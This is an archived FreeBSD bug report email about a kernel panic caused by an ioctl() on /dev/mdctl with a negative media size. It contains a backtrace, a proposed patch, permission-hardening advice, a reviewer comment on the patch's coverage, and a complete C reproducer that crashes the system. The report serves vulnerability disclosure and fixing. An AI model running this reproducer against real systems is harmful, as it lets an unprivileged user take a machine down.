From owner-freebsd-bugs@FreeBSD.ORG Tue Jul 17 18:00:23 2012
Return-Path:
Delivered-To: freebsd-bugs@hub.freebsd.org
Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 28203106566B for ; Tue, 17 Jul 2012 18:00:23 +0000 (UTC) (envelope-from gnats@FreeBSD.org)
Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 003138FC0C for ; Tue, 17 Jul 2012 18:00:22 +0000 (UTC)
Received: from freefall.freebsd.org (localhost [127.0.0.1]) by freefall.freebsd.org (8.14.5/8.14.5) with ESMTP id q6HI0M0H064834 for ; Tue, 17 Jul 2012 18:00:22 GMT (envelope-from gnats@freefall.freebsd.org)
Received: (from gnats@localhost) by freefall.freebsd.org (8.14.5/8.14.5/Submit) id q6HI0Mws064833; Tue, 17 Jul 2012 18:00:22 GMT (envelope-from gnats)
Resent-Date: Tue, 17 Jul 2012 18:00:22 GMT
Resent-Message-Id: <201207171800.q6HI0Mws064833@freefall.freebsd.org>
Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer)
Resent-To: freebsd-bugs@FreeBSD.org
Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Filip Palian
Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 214D21065672 for ; Tue, 17 Jul 2012 17:50:26 +0000 (UTC) (envelope-from nobody@FreeBSD.org)
Received: from red.freebsd.org (red.freebsd.org [IPv6:2001:4f8:fff6::22]) by mx1.freebsd.org (Postfix) with ESMTP id 0C6B58FC17 for ; Tue, 17 Jul 2012 17:50:26 +0000 (UTC)
Received: from red.freebsd.org (localhost [127.0.0.1]) by red.freebsd.org (8.14.4/8.14.4) with ESMTP id q6HHoP5A098958 for ; Tue, 17 Jul 2012 17:50:25 GMT (envelope-from nobody@red.freebsd.org)
Received: (from nobody@localhost) by red.freebsd.org (8.14.4/8.14.4/Submit) id q6HHoPQ2098957; Tue, 17 Jul 2012 17:50:25 GMT (envelope-from nobody)
Message-Id: <201207171750.q6HHoPQ2098957@red.freebsd.org>
Date: Tue, 17 Jul 2012 17:50:25 GMT
From: Filip Palian
To: freebsd-gnats-submit@FreeBSD.org
X-Send-Pr-Version: www-3.1
Cc:
Subject: misc/169947: System crash via ioctl() on mdctl.
X-BeenThere: freebsd-bugs@freebsd.org
X-Mailman-Version: 2.1.5
Precedence: list
List-Id: Bug reports
List-Unsubscribe: ,
List-Archive:
List-Post:
List-Help:
List-Subscribe: ,
X-List-Received-Date: Tue, 17 Jul 2012 18:00:23 -0000

>Number:         169947
>Category:       misc
>Synopsis:       System crash via ioctl() on mdctl.
>Confidential:   no
>Severity:       non-critical
>Priority:       low
>Responsible:    freebsd-bugs
>State:          open
>Quarter:
>Keywords:
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Tue Jul 17 18:00:22 UTC 2012
>Closed-Date:
>Last-Modified:
>Originator:     Filip Palian
>Release:        FreeBSD 9.0-RELEASE #0
>Organization:
>Environment:
FreeBSD fbsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:14:25 UTC 2012 root at obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENEREIC i386
>Description:
A user who has read permission on "/dev/mdctl" is able to crash the system (also from within a jail, provided the device is exposed there by devfs(.rules)) via the ioctl() handler in "/usr/src/sys/dev/md/md.c:1082". The crash occurs in the function swap_release_by_cred() (swap_pager.c:285), called from vm_object_deallocate() (md.c:1119). Some detailed information is included below.

-- cut --
fbsd dumped core - see /var/crash/vmcore.0

panic: swap_reserved < decr
Unread portion of the kernel message buffer:
panic: swap_reserved < decr
cpuid = 0
KDB: stack backtrace:
#0 0xc0a4b1d7 at kdb_backtrace+0x47
#1 0xc0a18737 at panic+0x117
#2 0xc0c6d147 at swap_release_by_cred+0x97   <--- panicked here
#3 0xc0c85684 at vm_object_destroy+0xd4
#4 0xc0c87825 at vm_object_terminate+0x2c5
#5 0xc0c880a7 at vm_object_deallocate+0x877
#6 0xc0c7da51 at vm_map_entry_deallocate+0x21
#7 0xc0c7daba at vm_map_process_deferred+0x2a
#8 0xc0c7ebfa at _vm_map_unlock+0x4a
#9 0xc0c7f2eb at vm_map_remove+0x6b
#10 0xc0c82543 at vmspace_exit+0xc3
#11 0xc09e9038 at exit1+0x6f8
#12 0xc09e9d7d at sys_sys_exit+0x1d
#13 0xc0d4c275 at syscall+0x355
#14 0xc0d35a51 at Xint0x80_syscall+0x21
Uptime: 2h36m43s
Physical memory: 1383 MB
Dumping 80 MB: 65 49 33 17 1
-- cut --

>How-To-Repeat:
Compile and execute the code from the attachment.

>Fix:
The "mediasize" member of the "md_s" structure should be of unsigned type. Currently it's of type off_t, which is "typedef long __int64_t". An alternative solution would be to add the following sanity condition at md.c:1091 (not to mention that the author's own comment there already says negative sizes are disallowed):

-- cut --
--- dev/md/md.c.old 2012-07-15 21:32:40.000000000 +0200
+++ dev/md/md.c 2012-07-15 21:30:00.000000000 +0200
@@ -1088,7 +1088,7 @@ mdcreate_swap(struct md_s *sc, struct md * Range check. Disallow negative sizes or any size less then the * size of a page. Then round to a page. */ - if (sc->mediasize == 0 || (sc->mediasize % PAGE_SIZE) != 0) + if (sc->mediasize <= 0 || (sc->mediasize % PAGE_SIZE) != 0) return (EDOM); /*
-- cut --

To prevent evil users from doing bad things, administrators should ensure that the "/dev/mdctl" permissions are rw (600) for root only. On servers where jails are provided to untrusted users (e.g. hosting companies), access to the "/dev/mdctl" device should be forbidden/hidden using devfs.rules.

Patch attached with submission follows:

/* The header names were stripped by the list archive; these are the
 * headers the code below needs (sys/mdioctl.h provides struct md_ioctl,
 * MDIOVERSION, MDIOCATTACH and the MD_* constants). */
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/mdioctl.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int
main(void)
{
	int f;
	struct md_ioctl s;
	struct stat ss;

	s.md_version = MDIOVERSION;
	// s.md_type = MD_SWAP;
	s.md_type = MD_PRELOAD;
	s.md_options = MD_CLUSTER | MD_AUTOUNIT | MD_COMPRESS;
	// typedef long long = int64 = off_t
	//s.md_mediasize = 4096*1000000000000000000000000000000000000000000000000000;
	/* Negative, page-aligned size: passes the "== 0" range check. */
	s.md_mediasize = -1000000000000;

	if (stat("/dev/mdctl", &ss) != 0) {
		printf("stat(\"/dev/mdctl\") failed: %s\n", strerror(errno));
		exit(0);
	}
	f = open("/dev/mdctl", O_RDONLY, 0);
	if (f < 0) {
		/* Without read permission on the node there is nothing to do. */
		printf("open(\"/dev/mdctl\") failed: %s\n", strerror(errno));
		exit(0);
	}
	printf("say goodnight...\n");
	if (ioctl(f, MDIOCATTACH, &s) < 0)
		printf("ioctl(MDIOCATTACH) failed: %s\n", strerror(errno));
	printf("no +r no fun\n");
	exit(0);
}

>Release-Note:
>Audit-Trail:
>Unformatted:
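Review bot: the `<= 0` test on the `+` line closes the negative-size hole, but it lives in mdcreate_swap() while the attached reproducer attaches with `s.md_type = MD_PRELOAD` (the MD_SWAP line is commented out) and the description points at the common MDIOCATTACH handler at md.c:1082; please confirm that a negative md_mediasize is rejected once, before the per-type create functions are reached, rather than only on the swap-backed path, otherwise the other backends still receive the value unchecked. While the surrounding comment is in the hunk, "less then" should read "less than".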